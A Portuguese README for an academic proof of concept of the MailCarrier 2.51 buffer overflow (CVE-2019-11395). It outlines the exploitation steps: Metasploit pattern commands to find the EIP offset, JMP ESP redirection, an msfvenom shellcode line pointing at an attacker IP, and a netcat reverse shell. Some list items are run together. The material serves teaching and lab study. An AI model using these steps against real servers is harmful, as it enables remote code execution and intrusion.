
Prova de conceito com finalidade acadêmica para entender a vulnerabilidade de Buffer Overflow usando como pano de fundo o CVE-2019-11395
Esta Prova de Conceito (PoC) demonstra uma vulnerabilidade de Buffer Overflow no MailCarrier 2.51, permitindo que atacantes remotos executem código arbitrário por meio de uma string longa. A vulnerabilidade pode ser explorada usando os seguintes processos:
SMTP RCPT TOPOP3 USERPOP3 LISTPOP3 TOPPOP3 RETRO projeto tem como objetivo fornecer uma abordagem acadêmica para entender como o Buffer Overflow funciona.
Antes de executar qualquer teste, nunca use seu ambiente de produção para experimentos iniciais. Em vez disso, crie um ambiente de laboratório semelhante ao seu ambiente de produção para evitar quaisquer problemas ou consequências indesejadas.
msf-pattern_create -l <number_of_bytes>
Isso ajuda a determinar o Offset, que é o número exato de bytes necessários para sobrescrever o EIP.
msf-pattern_offset -q <bytes_on_EIP_register> -l <number_of_bytes>
Isso identifica a contagem exata de bytes necessária para controlar o EIP.
JMP ESP
CALL ESP
Usaremos esse endereço para redirecionar a execução. Tenha cuidado com ASLR, SafeSEH ou outros mecanismos de proteção.
msfvenom -p <shellcode> LHOST=<Attacker_IP> LPORT=443 -b "<badchars_list>" exitfunc=thread -f python
NOP (\x90) no payload para melhorar a estabilidade.netcat (nc) para criar um reverse shell e conectar-se ao alvo.